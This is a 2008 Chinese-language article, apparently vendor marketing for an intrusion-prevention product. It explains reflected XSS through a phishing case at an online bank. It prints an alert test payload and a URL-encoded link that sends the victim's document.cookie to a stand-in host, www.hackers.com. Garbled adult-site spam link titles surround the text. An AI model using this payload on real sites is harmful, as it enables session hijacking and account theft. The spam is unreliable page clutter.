国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

長(zhǎng)URL背后的殺機(jī) 網(wǎng)站防范XSS攻擊實(shí)錄
2008-12-03   

XSS(Cross-site scripting)攻擊是最常見的Web攻擊之一,和其它Web攻擊類似的是,XSS也是利用Web頁面編碼的不嚴(yán)謹(jǐn),和SQL注入漏洞所不同的是,XSS漏洞更加難以發(fā)現(xiàn)避免。就連McAfee、Symantec、VeriSign這種專業(yè)安全公司,也在2008年1月的XEED.com報(bào)告中被爆出官網(wǎng)存在XSS漏洞。

此外,XSS攻擊還有另外一個(gè)與眾不同的特性:雖然駭客利用的是Web業(yè)務(wù)系統(tǒng)存在的漏洞,但真正的受害者卻是隨后訪問這些Web系統(tǒng)的用戶。

正是由于以上兩個(gè)特性——難以避免、難以察覺,所以想要防御XSS攻擊非常困難。啟明星辰推出的天清入侵防御產(chǎn)品,采用基于攻擊手法分析的檢測(cè)方法,對(duì)Web威脅如SQL注入、XSS攻擊等進(jìn)行全面檢測(cè)和防御。與傳統(tǒng)的基于數(shù)據(jù)特征匹配和基于異常模型構(gòu)建的Web安全相比,有著更低的漏報(bào)率和誤報(bào)率。

1.網(wǎng)上銀行謹(jǐn)防XSS攻擊

大家都用過網(wǎng)站的搜索功能,提供一個(gè)搜索輸入框,用戶在框中輸入想要查找的內(nèi)容,提交后臺(tái)數(shù)據(jù)庫檢索。但如果提交的輸入信息不是字符串,而是一段可執(zhí)行指令呢?一個(gè)很常見的XSS例子,在輸入框中填入“"><SCRIPT>alert('XSS%20Testing')</SCRIPT>”(不包括最外側(cè)的雙引號(hào)),一些沒有做嚴(yán)格過濾的站點(diǎn)將會(huì)彈出一個(gè)alert框,顯示“XSS Testing”,這意味著這段腳本已經(jīng)被執(zhí)行了。Reflect-based XSS(反射式XSS)利用的就是這樣一個(gè)原理。

下就是一則利用XSS漏洞進(jìn)行網(wǎng)銀詐騙的真實(shí)案例。

小陳是ebank  網(wǎng)上銀行的安全維護(hù)人員,有一天忽然接到客服部門轉(zhuǎn)來的客戶投訴,稱收到一條交易提醒,但該客戶僅做過網(wǎng)上銀行的登錄,并沒有做過付款動(dòng)作。

“你們給我發(fā)了一封郵件,說是有分期付款買筆記本電腦的優(yōu)惠活動(dòng),我就點(diǎn)鏈接進(jìn)來看,可沒幾分鐘,我就收到交易提醒,說網(wǎng)上付款4784元,請(qǐng)我確認(rèn),但我還沒下單呢,你們這是怎么回事?”電話里客戶的聲音明顯帶著壓抑不住的憤怒。
經(jīng)過確認(rèn),該客戶使用的PC并不存在病毒,而且也的確是僅點(diǎn)擊了廣告郵件的鏈接而已。“那你把這封郵件發(fā)給我看看吧”,小陳在排除了其它可能性后,這么告訴客戶,“分析出結(jié)果我們的客服人員將第一時(shí)間通知您,您現(xiàn)在的這筆費(fèi)用我們先凍結(jié),待解決后給您恢復(fù)”。

在收到客戶轉(zhuǎn)發(fā)來的郵件后,小陳第一眼就看出了問題,這不是ebank的系統(tǒng)郵件,而是一封釣魚郵件,偽造了發(fā)件人名稱的釣魚郵件。其中關(guān)于促銷優(yōu)惠活動(dòng)的頁面都是截取了真實(shí)活動(dòng)頁面,但在“點(diǎn)擊參加活動(dòng)”的按鈕后面,卻隱藏著重重的殺機(jī)。
這個(gè)鏈接并非是正常促銷活動(dòng)所在的頁面,而是如下所示的一個(gè)長(zhǎng)URL

<ahref="http://www.ebank.com/query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%

3Bimg.src%3D%22http%3A%2F%2Fwww.hackers.com%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E+">點(diǎn)擊參加活動(dòng)</a>

一般的用戶在看到URL開頭是正確的網(wǎng)站域名ebank,都不會(huì)懷疑郵件的真實(shí)性,而駭客正是利用這一心理,精心設(shè)置了圈套,利用了Ebank的某個(gè)輸入域中存在反射式XSS攻擊漏洞,通過<script>標(biāo)簽注入

"var img = new Image();img.src="

小陳拿著分析結(jié)果去找信息中心沈主任匯報(bào),而沈主任果然經(jīng)驗(yàn)豐富:“先發(fā)布網(wǎng)站緊急通知,告知用戶注意不要隨意點(diǎn)擊鏈接,然后迅速找專業(yè)安全公司做安全服務(wù),查清問題的根源再說。”并立刻聯(lián)系了專業(yè)安全廠商啟明星辰的當(dāng)?shù)劁N售人員。

經(jīng)過安星遠(yuǎn)程網(wǎng)站安全檢查服務(wù)的檢測(cè),發(fā)現(xiàn)ebank的網(wǎng)站存在數(shù)個(gè)XSS和SQL注入的漏洞,考慮到代碼級(jí)修改費(fèi)時(shí)太長(zhǎng),沈主任決定雙管齊下,一方面找開發(fā)人員修補(bǔ)現(xiàn)有漏洞,一方面咨詢是否有現(xiàn)成的專業(yè)安全產(chǎn)品可以防范XSS攻擊。在對(duì)比了數(shù)家國內(nèi)外的安全產(chǎn)品后,啟明星辰天清入侵防御產(chǎn)品的專業(yè)的Web安全防御能力給沈主任留下了深刻的印象,特別是其采用了攻擊機(jī)理分析方式,在防范XSS攻擊和SQL注入方面都有很好的效果。對(duì)網(wǎng)銀來說,時(shí)間可就是真金白銀,所以沈主任當(dāng)機(jī)立斷先購買一臺(tái)天清入侵防御系統(tǒng),并迅速上線。當(dāng)小陳嘗試用原來的長(zhǎng)URL進(jìn)行XSS攻擊時(shí),發(fā)現(xiàn)天清入侵防御產(chǎn)品信息報(bào)警監(jiān)視臺(tái)上已經(jīng)出現(xiàn)了報(bào)警信息并進(jìn)行了及時(shí)的阻斷。

2.相關(guān)提示

反射式XSS攻擊的對(duì)象如果是網(wǎng)站管理員,那么整個(gè)網(wǎng)站的權(quán)限都有可能因此而泄露給駭客。作為網(wǎng)站的所有者,不能因?yàn)槭芄粽咧皇瞧胀ㄓ脩舳鴮?duì)反射式XSS攻擊掉以輕心,采用專業(yè)的安全產(chǎn)品或仔細(xì)檢查你的所有頁面,既是對(duì)用戶負(fù)責(zé)也保障了自己的安全。而普通用戶也需要加強(qiáng)自身的安全意識(shí):采用擁有反向地址檢查技術(shù)的郵件系統(tǒng),盡量不要點(diǎn)擊過長(zhǎng)且包含未知域名的URL,當(dāng)然,采用一款防反射式XSS攻擊的瀏覽器,比如IE8,也是很有必要的。


熱詞搜索:

上一篇:對(duì)江西某電信服務(wù)器的一次安全檢查(1)
下一篇:利用跨站請(qǐng)求偽造攻擊本地網(wǎng)絡(luò)設(shè)備

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产精品一区二区三区99| 一区二区激情视频| 亚洲三级免费观看| 在线视频一区二区免费| 亚洲午夜影视影院在线观看| 91福利视频久久久久| 偷拍一区二区三区四区| 日韩免费看的电影| 国产91精品在线观看| 国产精品亲子乱子伦xxxx裸| 91在线免费播放| 美女诱惑一区二区| 国产精品国产三级国产aⅴ入口 | 成人伦理片在线| 亚洲青青青在线视频| 91精品国产综合久久久久久久| 国产高清无密码一区二区三区| 亚洲品质自拍视频| 精品美女被调教视频大全网站| 成人av在线网站| 麻豆精品国产91久久久久久| 亚洲另类春色校园小说| 久久影音资源网| 欧美性色aⅴ视频一区日韩精品| 蜜臀av一区二区在线观看| 亚洲少妇中出一区| 26uuu成人网一区二区三区| 色婷婷激情久久| 大陆成人av片| 国产一区日韩二区欧美三区| 亚洲国产综合色| 亚洲男同1069视频| 久久美女艺术照精彩视频福利播放| 欧美日韩黄色一区二区| av中文字幕亚洲| 成人自拍视频在线| 久久99国产精品成人| 欧美性videosxxxxx| 成人av资源在线观看| 国产综合色视频| 老色鬼精品视频在线观看播放| 亚洲综合清纯丝袜自拍| 亚洲美女免费视频| 亚洲视频1区2区| 中文字幕亚洲不卡| 国产精品久久久久影院亚瑟 | 欧美色网站导航| 99久久精品国产网站| 国产成人午夜视频| 国产露脸91国语对白| 精品一区二区三区视频| 蜜臀av性久久久久蜜臀aⅴ | 国产精品高潮久久久久无| 精品人在线二区三区| 欧美一区二区三区四区久久| 欧美亚洲一区二区三区四区| 91麻豆精品秘密| 色婷婷亚洲婷婷| 在线观看91精品国产入口| 亚洲一卡二卡三卡四卡五卡| 亚洲动漫第一页| av综合在线播放| 日本一区二区成人| 亚洲色图19p| 亚洲一区中文日韩| 亚洲黄色免费电影| 久久精品国产秦先生| 欧美日韩另类一区| 精品在线播放免费| 欧美一区二区三区小说| 欧洲国内综合视频| 色乱码一区二区三区88| 粉嫩一区二区三区在线看| 蜜臀久久久久久久| 日本一区二区三区四区在线视频| 蜜臀av性久久久久av蜜臀妖精 | 欧美色综合久久| 久久电影网电视剧免费观看| 一二三四区精品视频| 久久久久久久久久久99999| 不卡一卡二卡三乱码免费网站| 久久精品水蜜桃av综合天堂| 日本少妇一区二区| 成人美女在线观看| 日韩午夜激情av| 色婷婷综合在线| 91色porny| 国产91对白在线观看九色| 精品国产91洋老外米糕| 日本一区二区三区在线不卡| 亚洲最大色网站| 国产在线播放一区三区四| 99国产精品一区| 日韩三级在线免费观看| 欧美激情一区二区三区不卡| 亚洲成人一二三| 风间由美中文字幕在线看视频国产欧美 | 99久久夜色精品国产网站| 欧美日韩中文一区| 中文字幕乱码日本亚洲一区二区| 亚洲.国产.中文慕字在线| 成人美女视频在线看| 91精品一区二区三区久久久久久| 亚洲国产高清在线| 美腿丝袜亚洲色图| 欧美视频第二页| 日韩美女啊v在线免费观看| 久久99精品久久久久久国产越南| 91精品办公室少妇高潮对白| 国产清纯美女被跳蛋高潮一区二区久久w| 亚洲综合精品久久| 成人动漫中文字幕| 久久久不卡网国产精品二区| 免费一级欧美片在线观看| 欧美色网站导航| 一区二区三区不卡在线观看 | 久久超碰97中文字幕| 欧美中文字幕一二三区视频| 国产精品久久三区| 成人免费视频一区| 中文字幕免费不卡在线| 国产精品亚洲第一| 精品国产凹凸成av人导航| 青青青伊人色综合久久| 欧美日韩精品一区视频| 亚洲第一av色| 欧美日产国产精品| 天天综合天天综合色| 欧美日本一道本| 9色porny自拍视频一区二区| 精品国产乱码久久久久久老虎| 天堂va蜜桃一区二区三区 | 国产一区二区三区不卡在线观看| 欧美一区在线视频| 免费成人结看片| 久久综合色婷婷| 成人午夜在线视频| 亚洲免费观看高清完整版在线 | 在线观看免费视频综合| 丝袜诱惑制服诱惑色一区在线观看| 欧美三级视频在线观看 | 美女视频网站久久| 久久综合色婷婷| 不卡av电影在线播放| 亚洲少妇最新在线视频| 色成人在线视频| 天天综合天天做天天综合| 日韩女优毛片在线| 国产成人午夜99999| 亚洲人亚洲人成电影网站色| 色综合久久88色综合天天| 日韩电影在线一区| 久久免费偷拍视频| 色婷婷久久久久swag精品| 亚洲国产人成综合网站| 日韩免费看的电影| 91网上在线视频| 男女激情视频一区| 中文字幕一区二区5566日韩| 欧美日韩精品一区视频| 国产成人99久久亚洲综合精品| 亚洲欧美日韩一区二区| 欧美一级专区免费大片| 福利91精品一区二区三区| 亚洲成人一区二区在线观看| 国产亚洲综合在线| 欧美日韩国产经典色站一区二区三区 | 一区二区三区视频在线观看| 制服丝袜亚洲色图| 成人v精品蜜桃久久一区| 亚洲成av人片一区二区| 久久久久久97三级| 欧美日韩一区在线观看| 成人激情动漫在线观看| 欧美丰满嫩嫩电影| 国产精品原创巨作av| 亚洲成人av一区二区三区| 国产夜色精品一区二区av| 欧美日韩国产在线播放网站| 懂色av中文一区二区三区| 午夜精品一区二区三区电影天堂| 久久综合九色综合97_久久久| 欧美在线观看18| 成人一区二区三区视频在线观看| 亚洲成av人**亚洲成av**| 国产精品福利一区| 精品动漫一区二区三区在线观看| 欧美亚洲国产一区二区三区| 成人综合婷婷国产精品久久免费| 人人爽香蕉精品| 午夜欧美大尺度福利影院在线看| 综合色中文字幕| 中文字幕一区日韩精品欧美| 欧美激情一区二区三区全黄| 久久综合狠狠综合久久综合88| 欧美二区三区91| 欧美日本韩国一区| 欧美色欧美亚洲另类二区| 在线一区二区三区四区| 色综合一个色综合亚洲|